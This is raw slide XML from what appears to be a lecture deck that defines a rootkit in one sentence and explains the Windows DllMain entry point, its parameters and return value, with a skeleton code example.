                    <a:pt x="23" y="2"/>
                    <a:pt x="23" y="2"/>
                    <a:pt x="23" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="24" y="0"/>
                    <a:pt x="27" y="0"/>
                    <a:pt x="28" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="14"/>
                    <a:pt x="34" y="14"/>
                    <a:pt x="34" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="48" y="16"/>
                    <a:pt x="48" y="16"/>
                    <a:pt x="48" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="49" y="16"/>
                    <a:pt x="50" y="17"/>
                    <a:pt x="50" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="19"/>
                    <a:pt x="50" y="20"/>
                    <a:pt x="49" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="40" y="30"/>
                    <a:pt x="40" y="30"/>
                    <a:pt x="40" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="42" y="44"/>
                    <a:pt x="42" y="44"/>
                    <a:pt x="42" y="44"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="42" y="45"/>
                    <a:pt x="42" y="46"/>
                    <a:pt x="41" y="47"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="40" y="48"/>
                    <a:pt x="39" y="48"/>
                    <a:pt x="37" y="47"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="41"/>
                    <a:pt x="25" y="41"/>
                    <a:pt x="25" y="41"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="47"/>
                    <a:pt x="13" y="47"/>
                    <a:pt x="13" y="47"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="47"/>
                    <a:pt x="12" y="48"/>
                    <a:pt x="12" y="48"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="25" y="34"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="34"/>
                    <a:pt x="26" y="35"/>
                    <a:pt x="27" y="35"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="39"/>
                    <a:pt x="35" y="39"/>
                    <a:pt x="35" y="39"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="33" y="30"/>
                    <a:pt x="33" y="30"/>
                    <a:pt x="33" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="33" y="29"/>
                    <a:pt x="34" y="28"/>
                    <a:pt x="34" y="27"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="41" y="21"/>
                    <a:pt x="41" y="21"/>
                    <a:pt x="41" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="32" y="20"/>
                    <a:pt x="32" y="20"/>
                    <a:pt x="32" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="31" y="19"/>
                    <a:pt x="30" y="19"/>
                    <a:pt x="29" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="10"/>
                    <a:pt x="25" y="10"/>
                    <a:pt x="25" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="21" y="18"/>
                    <a:pt x="21" y="18"/>
                    <a:pt x="21" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="21" y="19"/>
                    <a:pt x="20" y="19"/>
                    <a:pt x="19" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="21"/>
                    <a:pt x="10" y="21"/>
                    <a:pt x="10" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="27"/>
                    <a:pt x="17" y="27"/>
                    <a:pt x="17" y="27"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="28"/>
                    <a:pt x="18" y="29"/>
                    <a:pt x="17" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="16" y="39"/>
                    <a:pt x="16" y="39"/>
                    <a:pt x="16" y="39"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="24" y="35"/>
                    <a:pt x="24" y="35"/>
                    <a:pt x="24" y="35"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="24" y="35"/>
                    <a:pt x="25" y="34"/>
                    <a:pt x="25" y="34"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:gradFill>
              <a:gsLst>
                <a:gs pos="0">
                  <a:srgbClr val="5C52FB"/>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="EFB616"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="2700000" scaled="0"/>
            </a:gra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endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="18" name="图形 17" descr="templates\docerresourceshop\icons\\32313535373331353b32313535373332313bc8cbb9a4d6c7c4dcbbfac6f7c8cb"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId10"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId11">
              <a:extLst>
                <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                  <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId12"/>
                </a:ext>
              </a:extLst>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="9506485" y="4632711"/>
              <a:ext cx="1260000" cy="1260000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7"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13"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1132205" y="1837690"/>
            <a:ext cx="9498965" cy="3011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gn="just">
              <a:lnSpc>
                <a:spcPts val="3700"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzPct val="200000"/>
              <a:buFontTx/>
              <a:buBlip>
                <a:blip r:embed="rId14"/>
              </a:buBlip>
              <a:extLst>
                <a:ext uri="{35155182-B16C-46BC-9424-99874614C6A1}">
                  <wpsdc:indentchars xmlns:wpsdc="http://www.wps.cn/officeDocument/2017/drawingmlCustomData" val="-150" checksum="656641676"/>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A rootkit is a type of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="0" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>malware designed to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>hide</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="0" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> the presence of other software, such as malware, on a computer system. Rootkits can be used to gain unauthorized access to a system, steal sensitive information, or carry out other malicious actions.</a:t>
            </a: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pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="图片 13" descr="2378 [转换]"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect l="-644" r="84596" b="8932"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="236220" y="5021965"/>
            <a:ext cx="1029547" cy="1440000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="378" name="折角形 377"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="955040" y="1355090"/>
            <a:ext cx="10281920" cy="3667125"/>
          </a:xfrm>
          <a:prstGeom prst="foldedCorner">
            <a:avLst>
              <a:gd name="adj" fmla="val 18909"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:sysClr val="window" lastClr="FFFFFF"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="152400" dist="38100" dir="5400000" algn="t" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>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79" name="任意多边形 378"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1050290" y="1355090"/>
            <a:ext cx="428625" cy="368935"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1500"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 1449"/>
              <a:gd name="connsiteX1" fmla="*/ 1500 w 1500"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 1449"/>
              <a:gd name="connsiteX2" fmla="*/ 1500 w 1500"/>
              <a:gd name="connsiteY2" fmla="*/ 1449 h 1449"/>
              <a:gd name="connsiteX3" fmla="*/ 768 w 1500"/>
              <a:gd name="connsiteY3" fmla="*/ 1098 h 1449"/>
              <a:gd name="connsiteX4" fmla="*/ 0 w 1500"/>
              <a:gd name="connsiteY4" fmla="*/ 1449 h 1449"/>
              <a:gd name="connsiteX5" fmla="*/ 0 w 1500"/>
              <a:gd name="connsiteY5" fmla="*/ 0 h 144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500" h="1449">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1500" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1500" y="1449"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="768" y="1098"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1449"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="E045DD"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:srgbClr val="005CA2">
              <a:shade val="50000"/>
            </a:srgbClr>
          </a:lnRef>
          <a:fillRef idx="1">
            <a:srgbClr val="005CA2"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:srgbClr val="005CA2"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:sysClr val="window" lastClr="FFFFFF"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>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6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1050290" y="1321435"/>
            <a:ext cx="9919335" cy="37007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38100" indent="0">
              <a:lnSpc>
                <a:spcPts val="3600"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzPct val="200000"/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="28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7"/>
              </a:buBlip>
              <a:extLst>
                <a:ext uri="{35155182-B16C-46BC-9424-99874614C6A1}">
                  <wpsdc:marlchars xmlns:wpsdc="http://www.wps.cn/officeDocument/2017/drawingmlCustomData" val="250" checksum="1039213347"/>
                </a:ext>
              </a:extLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="0" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>DllMain is a special function in a Windows Dynamic Link Library (DLL) that serves as an entry point for initializing and uninitializing the DLL when it's loaded and unloaded by processes. It's analogous to the main function in a C/C++ program but specific to DLLs. Here are the key points about DllMain:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="28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7"/>
              </a:buBlip>
              <a:extLst>
                <a:ext uri="{35155182-B16C-46BC-9424-99874614C6A1}">
                  <wpsdc:marlchars xmlns:wpsdc="http://www.wps.cn/officeDocument/2017/drawingmlCustomData" val="250" checksum="1039213347"/>
                </a:ext>
              </a:extLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="28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Point: Function Signature</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9" name="Text Box 28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2023745" y="1162685"/>
            <a:ext cx="8144510" cy="2207260"/>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500">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>BOOL WINAPI DllMain(</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HINSTANCE hinstDLL,  // Handle to the DLL module</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DWORD fdwReason,     // Reason for calling the function</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    LPVOID lpReserved    // Reserved; should be NULL</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2500">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2500">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2500">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Text Box 29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="528955" y="3629660"/>
            <a:ext cx="11134090" cy="2501900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>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hinstDLL</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is a handle to the DLL module. It is typically used to identify the instance of the DLL and obtain information about it.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>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fdwReason</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>:</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specifies the reason why DllMain is being called. It can have values like DLL_PROCESS_ATTACH, DLL_PROCESS_DETACH, DLL_THREAD_ATTACH, or DLL_THREAD_DETACH, indicating whether the DLL is being loaded or unloaded and whether it's happening for the entire process  or just for a specific thread.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l" fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="CA3E9D"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="m"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>lpReserved</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>This parameter is reserved for future use and should be NULL.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="0202060305040502030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Key Point: Return value and Entry and Exit</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3" name="Text Box 8" descr="7b0a202020202262756c6c6574223a20227b5c2263617465676f727949645c223a31303030362c5c2274656d706c61746549645c223a32303233313234377d222c0a20202020227461726765744964223a202270726f636573734f6e6c696e6542756c6c6574220a7d0a"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="455295" y="1238885"/>
            <a:ext cx="11263630" cy="46316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sm"/>
                <a:tailEnd type="none" w="sm" len="sm"/>
              </a14:hiddenLine>
            </a:ext>
          </a:extLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="en-US"/>
            </a:defPPr>
            <a:lvl1pPr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1pPr>
            <a:lvl2pPr marL="4572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2pPr>
            <a:lvl3pPr marL="9144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3pPr>
            <a:lvl4pPr marL="13716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4pPr>
            <a:lvl5pPr marL="1828800" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2286000" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2743200" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3200400" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="3657600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>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DllMain should return TRUE if it succeeds or FALSE if it fails. If it returns FALSE during a process's or thread's attachment, the DLL's loading is aborted, and it's immediately unloaded. This is typically done when the DLL cannot initialize properly.</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r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3000" b="0" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Entry and Exit Point: DllMain is automatically called by the operating system when a process loads or unloads the DLL. You don't call it explicitly in your code; the OS takes care of this.</a:t>
            </a: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a:p>
            <a:pPr marL="571500" indent="-533400">
              <a:lnSpc>
                <a:spcPts val="3600"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzPct val="200000"/>
              <a:buFontTx/>
              <a:buBlip>
                <a:blip r:embed="rId3"/>
              </a:buBlip>
              <a:extLst>
                <a:ext uri="{35155182-B16C-46BC-9424-99874614C6A1}">
                  <wpsdc:marlchars xmlns:wpsdc="http://www.wps.cn/officeDocument/2017/drawingmlCustomData" val="250" checksum="1039213347"/>
                </a:ext>
              </a:extLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3000" b="0" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="+mn-ea"/>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DllMain</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Text Box 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="991870" y="1075055"/>
            <a:ext cx="10208260" cy="5354320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="D1202F">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="D1202F"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>#include &lt;Windows.h&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pP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BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved)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switch (fdwReason)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DLL_PROCESS_ATTACH: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Initialization code for when the DLL is loaded into a process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DLL_PROCESS_DETACH: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Cleanup code for when the DLL is unloaded from a process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DLL_THREAD_ATTACH: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Initialization code for when a new thread is created</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case DLL_THREAD_DETACH:</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 Cleanup code for when a thread exits</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break;</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    return TRUE; // Return TRUE if successful</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="0202060305040502030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内容占位符 9"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="975360" y="318770"/>
            <a:ext cx="10400030" cy="441960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="3600" b="1" kern="1200">
                <a:solidFill>
                  <a:srgbClr val="A728BE"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="+mn-ea"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="457200" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2400" b="1" kern="1200">
                <a:solidFill>
                  <a:srgbClr val="005CA2"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="+mn-ea"/>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ysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" charset="-122"/>
